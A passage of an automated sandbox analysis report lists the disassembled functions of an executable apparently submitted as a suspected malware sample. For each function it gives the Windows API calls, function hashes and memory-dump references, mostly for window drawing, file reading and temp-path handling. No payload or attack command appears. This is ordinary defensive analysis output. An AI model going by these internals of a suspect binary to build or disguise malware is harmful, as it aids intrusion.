                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                • Instruction ID: 1f017aaef81dd0f0ed7cb9892c5a428a4034ef251f890bfd5ca3fce11066bb94
                                                                • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                • Instruction Fuzzy Hash: 8FE1AA71A04709DFDB24CF58C880BAEB7F5EB45305F15842EE896AB2D1D738AA91CF44
                                                                Function 00407458 Relevance: .3, Instructions: 300COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                • Instruction ID: 4c948e8094d30857df7bb037d19ad889c7f26ef399dade94ff28b4422ea0219f
                                                                • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                • Instruction Fuzzy Hash: A4C15931E042199BCF14CF68D8905EEBBB2BF88354F25866AD85677380D738B942CF95
                                                                Function 00404526 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045C4
                                                                • GetDlgItem.USER32(?,000003E8), ref: 004045D8
                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045F5
                                                                • GetSysColor.USER32(?), ref: 00404606
                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404614
                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404622
                                                                • lstrlenW.KERNEL32(?), ref: 00404627
                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404634
                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404649
                                                                • GetDlgItem.USER32(?,0000040A), ref: 004046A2
                                                                • SendMessageW.USER32(00000000), ref: 004046A9
                                                                • GetDlgItem.USER32(?,000003E8), ref: 004046D4
                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404717
                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404725
                                                                • SetCursor.USER32(00000000), ref: 00404728
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00404741
                                                                • SetCursor.USER32(00000000), ref: 00404744
                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404773
                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404785
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                • String ID: Call$N
                                                                • API String ID: 3103080414-3438112850
                                                                • Opcode ID: 3e7f1d81aaa2c81caad56aadef940d4d94f2f382e64dbbb27fd2036abddb4608
                                                                • Instruction ID: bc177dfd6b6b6103f733ab6784bbaef7ca361af311f51bfa08924dfc74b84e38
                                                                • Opcode Fuzzy Hash: 3e7f1d81aaa2c81caad56aadef940d4d94f2f382e64dbbb27fd2036abddb4608
                                                                • Instruction Fuzzy Hash: 79618EB1A00209FFDB109F60DD85AAA7B69FB85314F00843AFA15B72D1D778AD51CF98
                                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                • String ID: F
                                                                • API String ID: 941294808-1304234792
                                                                • Opcode ID: b27a2b551f63a02a5ae57bcc50d46a19120317da1eaca0d31fe5953092f3d4ab
                                                                • Instruction ID: eaab19ccb9cda740c31967da28403833e1322962c0e6ee158e4036cb66a51054
                                                                • Opcode Fuzzy Hash: b27a2b551f63a02a5ae57bcc50d46a19120317da1eaca0d31fe5953092f3d4ab
                                                                • Instruction Fuzzy Hash: ED418B71800209AFCF058FA5CE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                Function 0040605D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061F8,?,?), ref: 00406098
                                                                • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004060A1
                                                                  • Part of subcall function 00405E6C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                  • Part of subcall function 00405E6C: lstrlenA.KERNEL32(00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EAE
                                                                • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004060BE
                                                                • wsprintfA.USER32 ref: 004060DC
                                                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00406117
                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406126
                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040615E
                                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004061B4
                                                                • GlobalFree.KERNEL32(00000000), ref: 004061C5
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061CC
                                                                  • Part of subcall function 00405F07: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\No. 1349240400713.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405F0B
                                                                  • Part of subcall function 00405F07: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F2D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                • String ID: %ls=%ls$[Rename]
                                                                • API String ID: 2171350718-461813615
                                                                • Opcode ID: 9b519c14120aa80628a1efb59fa06e72263f7c501841ac8fb024acedf13bc814
                                                                • Instruction ID: d46549913b6b20842cf1787bef5cc60fb31ae9cbf3b8bb231415db86ef2d3bba
                                                                • Opcode Fuzzy Hash: 9b519c14120aa80628a1efb59fa06e72263f7c501841ac8fb024acedf13bc814
                                                                • Instruction Fuzzy Hash: 9D3135712017157BD2206B218D48F6B3A5CDF45754F15003AFE82FA2C3DA3CE9218ABD
                                                                Function 004066C0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\No. 1349240400713.exe",004034A0,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00406723
                                                                • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406732
                                                                • CharNextW.USER32(?,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\No. 1349240400713.exe",004034A0,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00406737
                                                                • CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\No. 1349240400713.exe",004034A0,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 0040674A
                                                                Strings
                                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004066C1
                                                                • *?|<>/":, xrefs: 00406712
                                                                • "C:\Users\user\Desktop\No. 1349240400713.exe", xrefs: 004066C0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Char$Next$Prev
                                                                • String ID: "C:\Users\user\Desktop\No. 1349240400713.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                                • API String ID: 589700163-3738611620
                                                                • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                • Instruction ID: 9627fccf098e727a5900f08bdddf05a21b4f43d755832024a56349c67539c63f
                                                                • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                • Instruction Fuzzy Hash: F2110D1580061295DB303B548C84A7B62F8EF5879CF52843FED96732C0E77D8C9286BD
                                                                Function 004043CE Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowLongW.USER32(?,000000EB), ref: 004043EB
                                                                • GetSysColor.USER32(00000000), ref: 00404429
                                                                • SetTextColor.GDI32(?,00000000), ref: 00404435
                                                                • SetBkMode.GDI32(?,?), ref: 00404441
                                                                • GetSysColor.USER32(?), ref: 00404454
                                                                • SetBkColor.GDI32(?,?), ref: 00404464
                                                                • DeleteObject.GDI32(?), ref: 0040447E
                                                                • CreateBrushIndirect.GDI32(?), ref: 00404488
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                • String ID:
                                                                • API String ID: 2320649405-0
                                                                • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                • Instruction ID: dd0feedb065fecc26b382c70af4fe1a3d395924493241b124500faa7aa9dc668
                                                                • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                • Instruction Fuzzy Hash: 7C2174B15007059BCB30DF78DA08B5BBBF8AF81714B05892EE992B26E1D734E904DB58
                                                                Function 004026E4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                                                  • Part of subcall function 00405FE8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FFE
                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                • String ID: 9
                                                                • API String ID: 163830602-2366072709
                                                                • Opcode ID: 939078a54e4475671e6551d3fd19772fabc7f31a6bf9158e4a480f344115c940
                                                                • Instruction ID: fc85df120a24998764995467ff6edc9a451c04e372c05a6abf1f77cf4653f2d7
                                                                • Opcode Fuzzy Hash: 939078a54e4475671e6551d3fd19772fabc7f31a6bf9158e4a480f344115c940
                                                                • Instruction Fuzzy Hash: 5C51F975D00219ABDF20DF95CA89AAEBB79FF04344F10817BE501B62D0E7B49D828B58
                                                                Function 00405479 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(0042C248,00000000,00425A20,771B23A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
                                                                • lstrlenW.KERNEL32(004033B0,0042C248,00000000,00425A20,771B23A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
                                                                • lstrcatW.KERNEL32(0042C248,004033B0,004033B0,0042C248,00000000,00425A20,771B23A0), ref: 004054D4
                                                                • SetWindowTextW.USER32(0042C248,0042C248), ref: 004054E6
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                • String ID:
                                                                • API String ID: 2531174081-0
                                                                • Opcode ID: 595c87a6c684e3cc3ecfa7d9121cf0e7c522785301409aa9d6fada1dea414851
                                                                • Instruction ID: 1ccddca99fa11d5427df38f31253403cabd393798f33362a1a37d4b4032a7ea7
                                                                • Opcode Fuzzy Hash: 595c87a6c684e3cc3ecfa7d9121cf0e7c522785301409aa9d6fada1dea414851
                                                                • Instruction Fuzzy Hash: 42219A71900518BBCB219F95DD85ACFBFB9EF45354F10803AF904B22A0C7798A908FA8
                                                                Function 00404D22 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D3D
                                                                • GetMessagePos.USER32 ref: 00404D45
                                                                • ScreenToClient.USER32(?,?), ref: 00404D5F
                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D71
                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D97
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Message$Send$ClientScreen
                                                                • String ID: f
                                                                • API String ID: 41195575-1993550816
                                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                • Instruction ID: 7205eec21020573454be23e67ac2b5f41aa1c09cc3aa20a5ad054807a565c042
                                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                • Instruction Fuzzy Hash: 63014C71900219BADB00DBA4DD85BFEBBBCAF54B11F10012BBA50F61C0D7B49A058BA5
                                                                Function 00401E4E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDC.USER32(?), ref: 00401E51
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
